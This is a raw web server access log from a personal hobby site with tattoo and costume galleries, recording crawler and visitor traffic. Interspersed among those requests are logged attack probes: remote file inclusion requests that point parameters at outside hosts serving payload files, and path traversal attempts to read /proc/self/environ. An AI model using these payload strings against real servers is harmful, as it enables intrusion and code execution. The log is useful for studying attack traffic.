87.250.255.243 - - [02/May/2010:16:20:50 -0500] "GET /costume/thmb1.htm HTTP/1.1" 200 3957 "-""Yandex/1.01.001 (compatible; Win16; I)"
81.208.34.38 - - [02/May/2010:16:21:51 -0500] "GET /logs/access_log.1217808000%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://zxz.dk//data/alfdoj/id1.txt??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
208.115.111.248 - - [02/May/2010:16:26:22 -0500] "GET /logs/access_log.1213142400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [02/May/2010:16:26:24 -0500] "GET /logs/access_log.1214784000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [02/May/2010:16:26:26 -0500] "GET /logs/access_log.1216684800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [02/May/2010:16:26:29 -0500] "GET /logs/access_log.1251417600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
208.115.111.248 - - [02/May/2010:16:26:31 -0500] "GET /logs/access_log.1260921600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)"
202.72.242.242 - - [02/May/2010:16:35:38 -0500] "GET /logs/access_log.1228089600%20%20//admin/business_inc/saveserver.php?thisdir=http://golfblaster3d.ru/includes/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
202.72.242.242 - - [02/May/2010:16:35:39 -0500] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://golfblaster3d.ru/includes/id1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
202.72.242.242 - - [02/May/2010:16:35:39 -0500] "GET //admin/business_inc/saveserver.php?thisdir=http://golfblaster3d.ru/includes/id1.txt?? HTTP/1.1" 404 318 "-""Mozilla/5.0"
202.72.242.242 - - [02/May/2010:16:36:20 -0500] "GET /logs/access_log.1231718400%20%20//admin/business_inc/saveserver.php?thisdir=http://golfblaster3d.ru/includes/id1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
87.250.255.243 - - [02/May/2010:16:39:45 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.195.226 - - [02/May/2010:16:42:55 -0500] "GET /logs/access_log.1165622400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
213.211.39.158 - - [02/May/2010:16:47:49 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.cz/search?hl=cs&lr=&client=firefox-a&hs=sfM&rls=org.mozilla:cs:official&channel=s&q=vintage+tattoo&start=10&sa=N""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:47:49 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:47:52 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:47:52 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:47:55 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:47:55 -0500] "GET /tattoo/tatsymbl.htm HTTP/1.1" 200 3085 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:48:00 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2362 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:48:00 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:48:00 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:48:00 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:48:00 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:48:00 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:48:00 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:48:01 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:48:01 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:48:01 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:48:01 -0500] "GET /tattoo/tat9.JPG HTTP/1.1" 200 16749 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:48:17 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:48:18 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:48:18 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:48:18 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:48:18 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:48:18 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:48:18 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:48:18 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:48:19 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:48:19 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:48:19 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:48:41 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:48:42 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:48:42 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
213.211.39.158 - - [02/May/2010:16:48:42 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.1; cs; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
207.46.199.54 - - [02/May/2010:16:49:25 -0500] "GET /logs/access_log.1236902400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.136 - - [02/May/2010:16:54:54 -0500] "GET /?S=A HTTP/1.1" 200 1003 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [02/May/2010:16:55:45 -0500] "GET /logs/access_log.1270166400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
67.195.112.180 - - [02/May/2010:17:04:26 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [02/May/2010:17:04:28 -0500] "GET /logs/access_log.1271116800 HTTP/1.0" 200 614646 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
207.46.199.45 - - [02/May/2010:17:08:55 -0500] "GET /logs/access_log.1259020800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.99 - - [02/May/2010:17:09:55 -0500] "GET /logs/access_log.1183939200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.204.195 - - [02/May/2010:17:11:25 -0500] "GET /logs/access_log.1253145600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [02/May/2010:17:14:46 -0500] "GET /logs/access_log.1236297600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
66.249.71.36 - - [02/May/2010:17:20:20 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Googlebot-Image/1.0"
66.249.71.36 - - [02/May/2010:17:20:20 -0500] "GET /artwork/clinic6.JPG HTTP/1.1" 200 13378 "-""Googlebot-Image/1.0"
66.249.71.36 - - [02/May/2010:17:20:23 -0500] "GET /artwork/clinic4.JPG HTTP/1.1" 200 9893 "-""Googlebot-Image/1.0"
207.46.13.84 - - [02/May/2010:17:26:26 -0500] "GET /logs/access_log.1233014400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.195.228 - - [02/May/2010:17:28:25 -0500] "GET /logs/access_log.1222473600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.43 - - [02/May/2010:17:31:28 -0500] "GET /logs/access_log.1224028800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.195.112.180 - - [02/May/2010:17:31:29 -0500] "GET /logs/access_log.1197331200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
216.129.119.42 - - [02/May/2010:17:33:18 -0500] "GET /logs/access_log.1238976000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [02/May/2010:17:34:05 -0500] "GET /logs/access_log.1208131200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.41 - - [02/May/2010:17:40:25 -0500] "GET /logs/access_log.1189814400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.55 - - [02/May/2010:17:41:55 -0500] "GET /logs/access_log.1204156800 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.13.140 - - [02/May/2010:17:45:54 -0500] "GET /logs/access_log.1234310400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [02/May/2010:17:54:58 -0500] "GET /logs/access_log.1219708800 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.189 - - [02/May/2010:17:58:24 -0500] "GET /logs/access_log.1240790400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
67.195.112.180 - - [02/May/2010:18:08:50 -0500] "GET /logs/access_log.1208217600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
92.240.42.10 - - [02/May/2010:18:09:15 -0500] "GET /playing.php/common/db.php?commonpath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 309 "-""libwww-perl/5.805"
87.250.255.243 - - [02/May/2010:18:12:01 -0500] "GET /logs/access_log.1266624000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
92.240.42.10 - - [02/May/2010:18:21:16 -0500] "GET /logs/access_log.1268611200/playing.php/common/db.php?commonpath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 336 "-""libwww-perl/5.805"
92.240.42.10 - - [02/May/2010:18:21:16 -0500] "GET /playing.php/common/db.php?commonpath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 309 "-""libwww-perl/5.805"
92.240.42.10 - - [02/May/2010:18:21:17 -0500] "GET /logs/playing.php/common/db.php?commonpath=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 314 "-""libwww-perl/5.805"
67.195.112.180 - - [02/May/2010:18:29:36 -0500] "GET /logs/access_log.1238889600 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [02/May/2010:18:30:36 -0500] "GET /logs/access_log.1207699200 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [02/May/2010:18:33:07 -0500] "GET /costume/thmb8.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.13.92 - - [02/May/2010:18:35:55 -0500] "GET /logs/access_log.1267574400 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
110.45.146.38 - - [02/May/2010:18:38:43 -0500] "GET /?INCLUDE_FOLDER=http://francophonie.utm.md/fx29id1.txt??? HTTP/1.1" 200 1003 "-""Mozilla/5.0"
110.45.146.38 - - [02/May/2010:18:38:44 -0500] "GET /logs/?INCLUDE_FOLDER=http://francophonie.utm.md/fx29id1.txt??? HTTP/1.1" 200 3993 "-""Mozilla/5.0"
110.45.146.38 - - [02/May/2010:18:38:44 -0500] "GET /logs/access_log.1268956800%20%20/?INCLUDE_FOLDER=http://francophonie.utm.md/fx29id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
110.45.146.38 - - [02/May/2010:18:45:44 -0500] "GET /logs/access_log.1265760000/?INCLUDE_FOLDER=http://francophonie.utm.md/fx29id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
110.45.146.38 - - [02/May/2010:18:45:46 -0500] "GET /logs/access_log.1262822400/?INCLUDE_FOLDER=http://francophonie.utm.md/fx29id1.txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
67.218.116.165 - - [02/May/2010:18:46:04 -0500] "GET /logs/access_log.1209686400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.199.191 - - [02/May/2010:18:47:00 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.129.119.12 - - [02/May/2010:18:48:18 -0500] "GET /logs/access_log.1215734400 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
87.250.255.243 - - [02/May/2010:18:52:16 -0500] "GET /costume/thmb2.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"